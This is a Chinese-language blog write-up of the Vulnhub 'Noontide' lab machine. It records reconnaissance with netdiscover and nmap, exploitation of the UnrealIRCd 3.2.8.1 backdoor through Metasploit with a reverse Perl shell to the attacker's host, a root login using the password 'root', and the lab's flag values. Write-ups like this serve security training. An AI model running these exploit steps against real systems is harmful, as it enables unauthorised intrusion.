Noontide
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Noontide]
└─$ sudo netdiscover -i eth1
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:d5:24:77 1 60 PCS Systemtechnik GmbH
192.168.56.168 08:00:27:63:26:17 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.168
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Noontide]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.168 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-10 04:28 EST
Nmap scan report for bogon (192.168.56.168)
Host is up (0.00012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
6667/tcp open irc UnrealIRCd
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
MAC Address: 08:00:27:63:26:17 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.60 seconds
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Noontide]
└─$ searchsploit unrealircd
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service | windows/dos/27407.pl
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Vulnhub/Noontide]
└─$ msfconsole
`:oDFo:`
./ymM0dayMmy/.
-+dHJ5aGFyZGVyIQ==+-
`:sm⏣~~Destroy.No.Data~~s:`
-+h2~~Maintain.No.Persistence~~h+-
`:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:`
./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/.
-++SecKCoin++e.AMd` `.-://///+hbove.913.ElsMNh+-
-~/.ssh/id_rsa.Des- `htN01UserWroteMe!-
:dopeAW.No<nano>o :is:TЯiKC.sudo-.A:
:we're.all.alike'` The.PFYroy.No.D7:
:PLACEDRINKHERE!: yxp_cmdshell.Ab0:
:msf>exploit -j. :Ns.BOB&ALICEes7:
:---srwxrwx:-.` `MS146.52.No.Per:
:<script>.Ac816/ sENbove3101.404:
:NT_AUTHORITY.Do `T:/shSYSTEM-.N:
:09.14.2011.raid /STFU|wall.No.Pr:
:hevnsntSurb025N. dNVRGOING2GIVUUP:
:#OUTHOUSE- -s: /corykennedyData:
:$nmap -oS SSo.6178306Ence:
:Awsm.da: /shMTl#beats3o.No.:
:Ring0: `dDestRoyREXKC3ta/M:
:23d: sSETEC.ASTRONOMYist:
/- /yo- .ence.N:(){ :|: & };:
`:Shall.We.Play.A.Game?tron/
```-ooy.if1ghtf0r+ehUser5`
..th3.H1V3.U2VjRFNN.jMh+.`
`MjM~~WE.ARE.se~~MMjMs
+~KANSAS.CITY's~-`
J~HAKCERS~./.`
.esc:wq!:`
+++ATH`
`
=[ metasploit v6.2.9-dev ]
+ -- --=[ 2230 exploits - 1177 auxiliary - 398 post ]
+ -- --=[ 867 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Enable verbose logging with set VERBOSE
true
msf6 > search unrealircd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 6667 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic Target
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 192.168.56.168
RHOSTS => 192.168.56.168
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit
[-] 192.168.56.168:6667 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
cmd/unix/
set payload cmd/unix/bind_perl set payload cmd/unix/bind_ruby_ipv6 set payload cmd/unix/reverse_bash_telnet_ssl set payload cmd/unix/reverse_ruby
set payload cmd/unix/bind_perl_ipv6 set payload cmd/unix/generic set payload cmd/unix/reverse_perl set payload cmd/unix/reverse_ruby_ssl
set payload cmd/unix/bind_ruby set payload cmd/unix/reverse set payload cmd/unix/reverse_perl_ssl set payload cmd/unix/reverse_ssl_double_telnet
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/
set payload cmd/unix/bind_perl set payload cmd/unix/bind_ruby_ipv6 set payload cmd/unix/reverse_bash_telnet_ssl set payload cmd/unix/reverse_ruby
set payload cmd/unix/bind_perl_ipv6 set payload cmd/unix/generic set payload cmd/unix/reverse_perl set payload cmd/unix/reverse_ruby_ssl
set payload cmd/unix/bind_ruby set payload cmd/unix/reverse set payload cmd/unix/reverse_perl_ssl set payload cmd/unix/reverse_ssl_double_telnet
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.56.168 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 6667 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 192.168.56.137
LHOST => 192.168.56.137
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LPORT 5555
LPORT => 5555
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit
[*] Started reverse TCP double handler on 192.168.56.137:5555
[*] 192.168.56.168:6667 - Connected to 192.168.56.168:6667...
:irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
:irc.foonet.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.56.168:6667 - Sending backdoor command...
[*] Exploit completed, but no session was created.
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) >
利用searchsploit查找与服务unrealircd相关的exploit,先尝试第一种,需要改变payload类型
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 6667 yes The target port (TCP)
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 192.168.56.168
RHOSTS => 192.168.56.168
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 192.168.56.137
LHOST => 192.168.56.137
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit
[*] Started reverse TCP handler on 192.168.56.137:4444
[*] 192.168.56.168:6667 - Connected to 192.168.56.168:6667...
:irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
:irc.foonet.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.56.168:6667 - Sending backdoor command...
[*] Command shell session 1 opened (192.168.56.137:4444 -> 192.168.56.168:48516) at 2022-11-10 04:40:52 -0500
id
uid=1000(server) gid=1000(server) groups=1000(server),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
重新选择payload类型,选择基于perl的反弹shell
成功拿到了shell
提权
server@noontide:~$ cat local.txt
cat local.txt
c53c08b5bf2b0801c5d0c24149826a6e
server@noontide:~$ su - root
su - root
Password: root
root@noontide:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@noontide:~# cd /root
cd /root
root@noontide:~# ls -alh
ls -alh
total 24K
drwx------ 3 root root 4.0K Aug 8 2020 .
drwxr-xr-x 18 root root 4.0K Aug 8 2020 ..
lrwxrwxrwx 1 root root 9 Aug 8 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4.0K Aug 8 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 85 Aug 8 2020 proof.txt
root@noontide:~# cat proof.txt
cat proof.txt
ab28c8ca8da1b9ffc2d702ac54221105
Thanks for playing! - Felipe Winsnes (@whitecr0wz)
root@noontide:~#
尝试root的简单密码root,直接就提权成功!
从这个靶机的解题过程来看,metasploit选择payload会关系到是否可以执行成功。
标签:set,cmd,payload,unix,Vulnhub,靶机,irc,root,Noontide From: https://www.cnblogs.com/jason-huawen/p/16877909.html